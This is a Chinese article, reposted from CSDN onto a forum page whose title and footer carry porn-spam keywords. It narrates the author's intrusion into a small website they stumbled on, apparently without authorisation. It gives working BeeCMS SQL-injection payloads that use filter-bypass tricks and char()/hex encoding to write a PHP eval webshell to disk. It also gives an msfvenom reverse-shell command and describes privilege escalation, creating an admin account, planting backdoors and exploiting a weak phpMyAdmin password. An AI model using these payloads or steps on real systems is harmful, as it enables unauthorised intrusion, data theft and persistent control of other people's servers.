在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線(xiàn)課程
  • 觀看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

記錄某一次無(wú)意點(diǎn)開(kāi)的一個(gè)小網(wǎng)站的滲透過(guò)程

工程師鄧生 ? 來(lái)源:CSDN ? 作者:Deilty ? 2022-09-09 09:09 ? 次閱讀

記錄某一次無(wú)意點(diǎn)開(kāi)的一個(gè)小網(wǎng)站的滲透過(guò)程,幸運(yùn)的是搭建平臺(tái)是phpstudy,cms是beecms,beecms有通用漏洞,然后去網(wǎng)上找了資料,成功getshell并獲取服務(wù)器權(quán)限。

一、滲透過(guò)程

無(wú)意點(diǎn)開(kāi)一個(gè)網(wǎng)站,發(fā)現(xiàn)網(wǎng)站比較小,且看起來(lái)比較老,然后發(fā)現(xiàn)logo沒(méi)有改,于是乎去百度搜索這個(gè)cms,發(fā)現(xiàn)有通用漏洞,Beecms 通用漏洞

9f54549e-2fd7-11ed-ba43-dac502259ad0.png

這里運(yùn)氣比較好,沒(méi)有更改后臺(tái)地址,還是默認(rèn)地址/admin/login.php

a01ba2a6-2fd7-11ed-ba43-dac502259ad0.png

通過(guò)通用漏洞發(fā)先后臺(tái)管理處存在sql注入漏洞,直接輸入admin’,然后就會(huì)報(bào)錯(cuò),這里用萬(wàn)能密碼不能登陸,看來(lái)還是得通過(guò)上面得通用漏洞來(lái)進(jìn)行注入

a10710ba-2fd7-11ed-ba43-dac502259ad0.png

可以看到輸入payload后,頁(yè)面返回正常,從而可以判斷有sql注入,這里采用雙寫(xiě)進(jìn)行繞過(guò)a159dd9a-2fd7-11ed-ba43-dac502259ad0.png

發(fā)現(xiàn)這個(gè)注入點(diǎn)后,就有各種各樣的注入方式了,通過(guò)sql語(yǔ)句寫(xiě)入一句話(huà),sqlmap一把梭,手工注入得到賬號(hào)密碼等等,怎么方便怎么來(lái),這里我把幾種方法都寫(xiě)一下,看看那種方法可以

方法一

1.通過(guò)post抓包sqlmap一把梭,dump出管理員賬號(hào)密碼,進(jìn)后臺(tái)找上傳點(diǎn)

2.一把梭,發(fā)現(xiàn)并沒(méi)有,使用腳本也沒(méi)有繞過(guò)

a17de23a-2fd7-11ed-ba43-dac502259ad0.png

方法二

1.通過(guò)burp抓包,寫(xiě)入一句話(huà),payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,發(fā)現(xiàn)寫(xiě)入失敗,前面講到有防護(hù),這里通過(guò)hex編碼或者char函數(shù)繞過(guò)

a387b84e-2fd7-11ed-ba43-dac502259ad0.png

2.對(duì)shell部分進(jìn)行編碼

a3a64f52-2fd7-11ed-ba43-dac502259ad0.png

3.寫(xiě)入shell的payload為:注意:記得在編碼轉(zhuǎn)換的時(shí)候前面加0x或者直接用unhex函數(shù),但是本次實(shí)驗(yàn)用unhex函數(shù)一直失敗,所以在前面加0x,看到可以寫(xiě)入成功。

ps:這里的寫(xiě)入路徑純屬盲猜,運(yùn)氣好,默認(rèn)目錄

a3e19148-2fd7-11ed-ba43-dac502259ad0.png

4.用蟻劍連接,成功連接,至此getshell完畢,下來(lái)就是后滲透階段,后面會(huì)講

a4177cea-2fd7-11ed-ba43-dac502259ad0.png

char函數(shù)繞過(guò):mysql內(nèi)置函數(shù)char()可以將里面的ascii碼轉(zhuǎn)換為字符串,payload為:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

a44b1302-2fd7-11ed-ba43-dac502259ad0.png

一樣成功寫(xiě)入

1.寫(xiě)入成功后,菜刀可以連接,我們?cè)L問(wèn)寫(xiě)入的文件,驚奇的發(fā)現(xiàn)竟然有admin,和一串md5碼,大膽猜測(cè)可能是后臺(tái)賬號(hào)和密碼,試一下

a49a1e7a-2fd7-11ed-ba43-dac502259ad0.png

2.md5解密,wocao,成功登陸,然后就是后臺(tái)找上傳了

a4b97c34-2fd7-11ed-ba43-dac502259ad0.png

二、后滲透

通過(guò)whoami查看權(quán)限,發(fā)現(xiàn)是admin權(quán)限,但是不是最高權(quán)限,我們要提到最高權(quán)限去

a4db327a-2fd7-11ed-ba43-dac502259ad0.png

方法一

1.通過(guò)msf生成木馬提權(quán),payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通過(guò)蟻劍上傳木馬,并執(zhí)行。執(zhí)行之前打開(kāi)msf使用模塊use exploit/multi/handler,設(shè)置相應(yīng)參數(shù),然后開(kāi)始監(jiān)聽(tīng)

a4fcc3cc-2fd7-11ed-ba43-dac502259ad0.png

3.不知道什么問(wèn)題,用這個(gè)沒(méi)有成功,那么只能通過(guò)大馬提權(quán)了

方法二

1.上傳大馬,此處應(yīng)該有狗或者盾之類(lèi)的,用的免殺,成功上傳

2.訪(fǎng)問(wèn)大馬

a5226096-2fd7-11ed-ba43-dac502259ad0.png

3.這里提權(quán)方式很多,就不細(xì)說(shuō)了,有大馬之后很多操作都可以引刃而解了,開(kāi)放端口,添加賬號(hào),留后門(mén)。。等等

4.創(chuàng)建admin權(quán)限賬號(hào)之后,登陸服務(wù)器

a569434e-2fd7-11ed-ba43-dac502259ad0.png

三、一些其他的發(fā)現(xiàn)

通過(guò)掃描目錄,還發(fā)現(xiàn)有phpmyadmin,可以爆破,這里我試了下竟然是弱口令,都是root,但是連接不上,只能通過(guò)phpmyadmin登陸,發(fā)現(xiàn)是低版本的phpstudy搭建的,這里就可以另一種思路,利用日志文件寫(xiě)入一句話(huà)getshell

a5f611de-2fd7-11ed-ba43-dac502259ad0.png

四、總結(jié) 1.前臺(tái)sql注入獲取用戶(hù)名密碼,進(jìn)入后臺(tái)找上傳 2.SQL注入語(yǔ)句寫(xiě)入一句話(huà) 3.phpmyadmin一句話(huà)getshell 4.上傳大馬提權(quán)

至此,滲透結(jié)束。


審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    775

    瀏覽量

    44258
  • 編碼
    +關(guān)注

    關(guān)注

    6

    文章

    958

    瀏覽量

    54957
  • ASCII
    +關(guān)注

    關(guān)注

    5

    文章

    172

    瀏覽量

    35206

原文標(biāo)題:實(shí)戰(zhàn) | 一次小網(wǎng)站滲透過(guò)程

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    ads8568采集基本正常,但可能在某一次上電后,出現(xiàn)不工作的狀態(tài),為什么?

    現(xiàn)在遇到這樣問(wèn)題:ads8568采集基本正常,但可能在某一次上電后,出現(xiàn)不工作的狀態(tài)(busy為高),必須重新上電才能正常,CONVST、RD、CS等輸入正常 說(shuō)明:此AD芯片掛在fpga上,供電電壓HVDD和HVSS連接+5v,-5v,與模擬電壓共用 DVDD:+3.3v 數(shù)字
    發(fā)表于 02-06 08:00

    文帶你了解透過(guò)率測(cè)量

    透過(guò)率的定義光透過(guò)能力,即透光率,描述的是特定條件下,物體透過(guò)的光量與其接收的入射光量之間的比例。在光的傳播過(guò)程中,部分光線(xiàn)會(huì)被物體吸收,而另
    的頭像 發(fā)表于 11-04 13:00 ?251次閱讀
    <b class='flag-5'>一</b>文帶你了解<b class='flag-5'>透過(guò)</b>率測(cè)量

    一次電源與二電源有什么不同

    在電力系統(tǒng)和電子設(shè)備的供電領(lǐng)域中,一次電源與二電源是兩個(gè)至關(guān)重要的概念。它們各自承擔(dān)著不同的功能和角色,共同確保電力供應(yīng)的穩(wěn)定性和可靠性。本文將對(duì)一次電源與二
    的頭像 發(fā)表于 10-10 14:10 ?2642次閱讀

    一次電池分類(lèi)以及應(yīng)用場(chǎng)景詳解

    01 一次電池簡(jiǎn)介 一次電池即原電池(primarycell、primarybattery)(俗稱(chēng)干電池),是放電后不能再充電使其復(fù)原的電池,通電電池有正極、負(fù)極電解以及容器和隔膜等組成。 一次電池
    的頭像 發(fā)表于 09-30 17:52 ?1116次閱讀
    <b class='flag-5'>一次</b>電池分類(lèi)以及應(yīng)用場(chǎng)景詳解

    無(wú)線(xiàn)時(shí)鐘秒轉(zhuǎn)一次思路怎么設(shè)置

    創(chuàng)建個(gè)無(wú)線(xiàn)時(shí)鐘,使其每秒轉(zhuǎn)動(dòng)一次,涉及到多個(gè)領(lǐng)域的知識(shí),包括電子工程、無(wú)線(xiàn)通信、編程和機(jī)械設(shè)計(jì)。 1. 項(xiàng)目概述 無(wú)線(xiàn)時(shí)鐘每秒轉(zhuǎn)動(dòng)一次的項(xiàng)目可以分為以下幾個(gè)主要部分: 機(jī)械設(shè)計(jì) :設(shè)
    的頭像 發(fā)表于 09-07 09:21 ?352次閱讀

    電氣一次設(shè)備有哪些其功能是什么

    電氣一次設(shè)備是指那些直接參與電能的生產(chǎn)、轉(zhuǎn)換以及輸配過(guò)程的設(shè)備。這些設(shè)備在電力系統(tǒng)中扮演著核心角色,確保電能從生產(chǎn)到消費(fèi)的各個(gè)環(huán)節(jié)能夠高效、安全地進(jìn)行。具體來(lái)說(shuō),電氣一次設(shè)備主要包括以下幾大類(lèi)
    的頭像 發(fā)表于 08-27 14:50 ?1224次閱讀

    labview如何做到一次觸發(fā)采集一次

    最近在做一個(gè)電壓測(cè)試模塊,要求是在一個(gè)時(shí)間段內(nèi),出現(xiàn)個(gè)上升沿觸發(fā)采集,并且只采集一次,采集次數(shù)為出現(xiàn)上升沿的次數(shù),采集時(shí)間,采樣率及單
    發(fā)表于 08-07 10:16

    記錄一次RPC服務(wù)有損上線(xiàn)的分析過(guò)程

    1. 問(wèn)題背景 某應(yīng)用在啟動(dòng)完提供JSF服務(wù)后,短時(shí)間內(nèi)出現(xiàn)了大量的空指針異常。 分析日志,發(fā)現(xiàn)是服務(wù)依賴(lài)的藏經(jīng)閣配置數(shù)據(jù)未加載完成導(dǎo)致。即所謂的 有損上線(xiàn) 或者是 直接發(fā)布 , 當(dāng) 應(yīng)用啟動(dòng)時(shí),service還沒(méi)加載完,就開(kāi)始對(duì)外提供服務(wù),導(dǎo)致失敗調(diào)用 。 關(guān)鍵代碼如下 數(shù)據(jù)的初始化加載是通過(guò)實(shí)現(xiàn)CommandLineRunner接口完成的 @Componentpublic class LoadSystemArgsListener implements CommandLineRunner { @Resource private CacheLoader cjgConfigCacheLoader; @Override public void run(String...
    的頭像 發(fā)表于 07-30 09:58 ?312次閱讀
    <b class='flag-5'>記錄</b><b class='flag-5'>一次</b>RPC服務(wù)有損上線(xiàn)的分析<b class='flag-5'>過(guò)程</b>

    記錄一次使用easypoi時(shí)與源碼博弈的過(guò)程

    、背景介紹 最近剛剛接手了保險(xiǎn)線(xiàn)之聲平臺(tái)的開(kāi)發(fā)和維護(hù)工作,第一個(gè)需要修復(fù)的問(wèn)題是:平臺(tái)的事件導(dǎo)出成excel功能在經(jīng)過(guò)一次上線(xiàn)之后突然不可用了,于是就開(kāi)始了幾輪痛苦的排查以及與源碼
    的頭像 發(fā)表于 07-03 16:33 ?402次閱讀
    <b class='flag-5'>記錄</b><b class='flag-5'>一次</b>使用easypoi時(shí)與源碼博弈的<b class='flag-5'>過(guò)程</b>

    一次消諧器的構(gòu)造

    今天來(lái)給大家介紹一下一次消諧器的構(gòu)造。 一次消諧器是種用于消除電力系統(tǒng)中的諧波及無(wú)功功率的裝置,它由感性元件和電容器構(gòu)成,感性元件用于吸收系統(tǒng)中的無(wú)功功率,而電容器則用于補(bǔ)償系統(tǒng)中的感性無(wú)功功率
    的頭像 發(fā)表于 05-30 14:55 ?475次閱讀

    鴻蒙OS開(kāi)發(fā):【一次開(kāi)發(fā),多端部署】(視頻應(yīng)用)

    提供了“一次開(kāi)發(fā),多端部署”的系統(tǒng)能力,讓開(kāi)發(fā)者可以基于一次開(kāi)發(fā),快速構(gòu)建不同類(lèi)型終端上的應(yīng)用,降低開(kāi)發(fā)成本,提高開(kāi)發(fā)效率。
    的頭像 發(fā)表于 05-25 16:29 ?4616次閱讀
    鴻蒙OS開(kāi)發(fā):【<b class='flag-5'>一次</b>開(kāi)發(fā),多端部署】(視頻應(yīng)用)

    鴻蒙OS開(kāi)發(fā):【一次開(kāi)發(fā),多端部署】(多天氣)項(xiàng)目

    本示例展示個(gè)天氣應(yīng)用界面,包括首頁(yè)、城市管理、添加城市、更新時(shí)間彈窗,體現(xiàn)一次開(kāi)發(fā),多端部署的能力。
    的頭像 發(fā)表于 05-20 14:59 ?912次閱讀
    鴻蒙OS開(kāi)發(fā):【<b class='flag-5'>一次</b>開(kāi)發(fā),多端部署】(<b class='flag-5'>一</b>多天氣)項(xiàng)目

    HarmonyOS開(kāi)發(fā)案例:【一次開(kāi)發(fā),多端部署(視頻應(yīng)用)】

    提供了“一次開(kāi)發(fā),多端部署”的系統(tǒng)能力,讓開(kāi)發(fā)者可以基于一次開(kāi)發(fā),快速構(gòu)建不同類(lèi)型終端上的應(yīng)用,降低開(kāi)發(fā)成本,提高開(kāi)發(fā)效率。
    的頭像 發(fā)表于 05-11 15:41 ?1572次閱讀
    HarmonyOS開(kāi)發(fā)案例:【<b class='flag-5'>一次</b>開(kāi)發(fā),多端部署(視頻應(yīng)用)】

    什么是一次配電系統(tǒng)和二配電系統(tǒng)?有何區(qū)別?

    一次配電系統(tǒng)和二配電系統(tǒng)是電力供應(yīng)網(wǎng)絡(luò)中的兩個(gè)不同層級(jí),它們?cè)陔娏鬏敗⒎峙浜涂刂品矫姘l(fā)揮著各自的作用。
    的頭像 發(fā)表于 04-30 17:28 ?7710次閱讀

    基波是一次諧波么 基波與一次諧波的區(qū)別

    基波是一次諧波么 基波與一次諧波的區(qū)別? 基波和一次諧波是兩個(gè)不同的概念。 基波是在諧波分析中指的是頻率最低且沒(méi)有任何諧波成分的波形,它是構(gòu)成復(fù)雜波形的基礎(chǔ)。在正弦波中,基波就是正弦波
    的頭像 發(fā)表于 04-08 17:11 ?8309次閱讀
    主站蜘蛛池模板: 天堂电影免费在线观看 | 奇米欧美成人综合影院 | 在线观看的黄网 | 国产综合精品久久亚洲 | 在线最新版www资源网 | 久久综合香蕉久久久久久久 | 狠狠轮 | ww欧洲ww在线视频看 | 亚洲最大黄色网址 | 啪啪午夜 | 性久久久久久久久 | 2021久久精品免费观看 | 在线观看黄a | 国产黄色在线 | free性欧美高清另类 | 国产午夜在线观看视频播放 | 国产黄mmd在线观看免费 | 欧美成人黄色 | 亚洲 图片 小说 欧美 另类 | 日本加勒比在线视频 | 毛片综合 | 亚洲一区中文字幕在线观看 | 日本欧美视频 | 四虎精品影院4hutv四虎 | 一级毛片免费网站 | 在线欧美成人 | 色综合小说天天综合网 | 人人搞人人干 | 亚洲69视频 | 在线免费观看黄色小视频 | 欧美777 | 免费看片你懂的 | 国产在线观看福利 | 久久久午夜精品理论片 | 狠狠色噜噜狠狠狠狠狠色综合久久 | 免费看黄色小视频 | 婷婷色5月 | 女人又色又爽又黄 | 久久青草国产手机看片福利盒子 | a毛片成人免费全部播放 | 中文字幕777 |